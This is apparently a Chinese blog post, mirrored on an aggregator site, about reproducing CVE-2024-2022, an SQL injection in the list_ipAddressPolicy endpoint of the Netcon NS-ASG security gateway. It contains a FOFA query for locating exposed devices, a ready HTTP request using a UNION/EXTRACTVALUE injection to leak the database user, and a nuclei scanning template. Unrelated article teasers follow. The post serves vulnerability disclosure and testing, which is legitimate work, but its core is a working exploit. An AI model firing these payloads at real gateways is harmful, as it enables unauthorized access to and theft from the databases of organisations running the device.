网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞（CVE-2024-2022）复现_网康ns-asg应用安全网关-程序员宅基地

技术标签：漏洞复现漏洞安全渗透测试

一、漏洞信息

漏洞名称：

网康应用安全网关(NS-ASG)-list_ipAddressPolicy-SQL注入漏洞

漏洞类别： SQL注入漏洞

风险等级：高危

二、漏洞描述

网康应用安全网关(NS-ASG) list_ipAddressPolicy 接口存在SQL注入漏洞。
攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

三、影响范围

网康应用安全网关(NS-ASG)

四、漏洞复现

FOFA：app="网康-NS-ASG-应用安全网关"

POC：

GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+user()),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

五、脚本

id: CVE-2024-2022

info:
  name: 网康NS-ASG应用安全网关sql注入漏洞
  severity: high
  author: tt
  metadata:
    max-request: 1
    fofa-query: app="网康科技-NS-ASG安全网关"
    verified: true
requests:
  - raw:
      - |+
        GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(123456)),0x7e)) HTTP/1.1
        Host: {
   {Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'e10adc3949ba59abbe56e057f20f883e')"

本文链接：https://blog.csdn.net/weixin_42277564/article/details/136642499

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

hive case when的选择顺序优先级问题_hive case when then-程序员宅基地

文章浏览阅读9.1k次，点赞6次，收藏9次。hive 中有case when 的语法是：case when 条件1 then 结果1when 条件2 then 结果2when 条件3 then 结果3......else 结果x end那如果被查询的行同时符合条件1和条件3呢？结果会是出现“结果1”还是“结果3”呢？根据测试，是符合结果1，原因是语句先“碰见” when 条件1 then 结果1这一句。如果语句改为：se..._hive case when then

中北网安实训笔记-（20200628）-域名信息、端口信息收集、nmap手册网址、敏感信息收集、GIT信息泄露_中北网络域名-程序员宅基地

文章浏览阅读232次。今天内容1.信息收集（收集目标所有可以收集的信息）工具客户端网页端域名信息（子域名）站点信息端口信息敏感信息2.扫描探测（awvs xray）漏洞的入口点——————————————————PPT：域名解析过程：用户–>浏览器输入baidu.com -->浏览器DXS服务器缓存–>系统缓存dns服务器缓存C://windows/system32/drivers/etc/host–>dns服务器（发送请求）whois查询备案域名划分子域名_中北网络域名

c语言用fun函数求最大公约数,C语言程序设计第七次作业(示例代码)-程序员宅基地

文章浏览阅读707次。一、学习内容本次课学习了函数的基本知识，需要大家对如下知识点进行总结：1. 函数定义的基本格式，函数定义和函数原型(声明)的区别何在？2. 函数的调用方式有哪几种3. 什么是形参，什么是实参，函数调用时的参数传递机制是什么？二、实验内容1.定义一个判断素数的函数isprime(int n)，利用该函数输出1000以内的所有素数，每行10个，最后输出一共有多少个素数。(每列对齐)2.求两个正整数的最..._调用fun函数求最大公约数

MyBatis-Plus实现多表联查（一对一，一对多使用）_mybatisplus一对多-程序员宅基地

文章浏览阅读3.8k次，点赞56次，收藏33次。在使用mybatis-plus开发需求的时候会发现对于大部分的业务场景来说都会使用到join来进行联表查询，但是mybatis-plus封装的 mapper 不支持 join，如果需要支持就需要自己手动去实现，给大家推荐一个好用的插件（Mybatis-Plus-Join（简称 MPJ）是一个 Mybatis-Plus的增强工具，在 MyBatis-Plus 的基础上只做增强不做改变，为简化开发、提高效率而生。_mybatisplus一对多

基于JAVA学生信息管理系统计算机毕业设计源码+系统+mysql数据库+lw文档+部署-程序员宅基地

文章浏览阅读106次。基于JAVA学生信息管理系统计算机毕业设计源码+系统+mysql数据库+lw文档+部署。springboot基于springboot和vue的酒店管理系统。springboot基于SpringBoot的自助旅游导航系统。springboot基于JSP的企业办公管理系统设计与实现。JSP宠物食品店系统的设计与实现sqlserver。ssm基于Java的幼儿早教系统软件的设计与实现。ssm基于vue的健康餐饮管理系统的设计与实现。ssm基于JAVA的求职招聘网站的设计与实现。

Nginx_Ubuntu-程序员宅基地

文章浏览阅读113次。一. 基本步骤　　1.1环境准备　　　　开始前，请确认gcc g++开发类库是否装好，默认已经安装。　　　　注:等待linux下载更新功能准备好了重启系统在执行下载安装命令,如执行命令没有问题可以继续往下走　　　　　　1. 最小Ubuntu安装插件　　　　　　1. 需要安装　　　　　　　　sudo apt-get install build-essen..._snail mock